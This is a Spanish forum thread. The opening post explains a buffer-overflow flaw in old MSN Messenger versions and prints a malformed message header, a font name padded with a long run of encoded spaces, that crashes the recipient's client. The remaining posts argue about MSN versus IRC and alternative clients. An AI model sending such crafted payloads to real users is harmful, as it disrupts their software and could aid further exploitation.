FTP | CCD | Buscar | Trucos | Trabajo | Foros |
|
Registrarse | FAQ | Miembros | Calendario | Guía de estilo | Temas de Hoy |
|
Herramientas | Buscar en Tema | Desplegado |
|
#1
|
||||
|
||||
Fallo de seguridad en Msn Messenger
Hace poco (dos o tres semanas) se descubrió una falla de seguridad en el Msn. Ya se ha pedido a todos los usuarios que actualicen su msn. Aún así hay gente que no lo ha hecho. Esta falla afecta a los usuarios de la versión 6.1 hacia abajo y ha aparecido junto a otra falla que permitiría la ejecución de programas en el pc de la víctima.
Pongo aquí el exploit del fallo primero, que provoca la caída del usuario que lo recibe. El bug consiste en hacer un desbordamiento de buffer al enviar un mensaje con fuente formateada, al enviarle una cadena larga que provoca el desbordamiento y la caida del msn atacado. Lo explico más detenidamente:Este es el encabezado normal de envio de mensajes: Código:
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22 Código:
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20New%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20Roman%20%20%20%20%20%20%20%20%2 0%20%20; EF=B; CO=ff; CS=0; PF=22
__________________
:) |
#2
|
||||
|
||||
Quien usa el MSN Messenger cuando existe el aMSN
__________________
Guía de Estilo. |
#3
|
||||
|
||||
I do .
__________________
Héctor Geraldino Software Engineer |
#4
|
||||
|
||||
Pues yo... Kopete!!, en serio, me parece mejor que el Alvaro Messenger y lo que anda por ahí... ahora mismito voy a poner un tema en debates para ver que sale del tema.
__________________
:) |
#5
|
||||
|
||||
Usar el MSN existiendo el IRC me parece propio de gente desinformada.
Y al que diga eso de "es que mis 'contactos' usan el msn" le digo que eso no tiene ningún sentido, por ejemplo, yo tengo 'contactos' y saben que estoy en el IRC y si alguno me dice que el "usa el MSN" le enseño a usar el irc, y si no le interesa será porque tampoco necesitará nada de mí. Y si el que me dice eso es mi jefe o un cliente, le digo: "jefe, mas te vale desinstalar el MSN, a no ser que no te importe que cualquiere pueda leer tus conversaciones". Ojo: donde he escrito "gente desinformada" podría haber escrito "ignorantes" pero he preferido ser un poco moderado he dicho
__________________
"la única iglesia que ilumina es la que arde" Anonimo |
#6
|
||||
|
||||
¿Y con Irc no?, yo veo Irc el doble de inseguro que Msn... yo de Msn conozco dos fallos... y eso (y esoo!!!) que es de M$, pero de Irc conozco... puagh... existen montones... Messenger, sea cual sea el propietario, es un gran avance, pues te permite tener una lista de contactos y poder bloquear a tu gusto no estando a la vista de todos tu dirección Ip.
Además... ¿Puedes usar la webcam con irc?¿Puedes echarte una partidita al Buscaminas?¿Puedes escribir emoticonos?¿Hay algún "Messenger Plus!" (una muy buena extensión para Msn Messenger) para Irc?¿Hay nicks largos en irc?¿Tienes lista de contactos en irc o tienes que esperar a que se conecten a un canal?¿Puedes enviar un mensaje al móvil desde irc?¿Puedes ponerte "Estoy comiendo" o sólo en Ausente?¿Tiene fondo de ventana el irc?¿Puedes poner grupos a los canales en Irc? Si se puede... no lo sabía.
__________________
:) |
|
|
|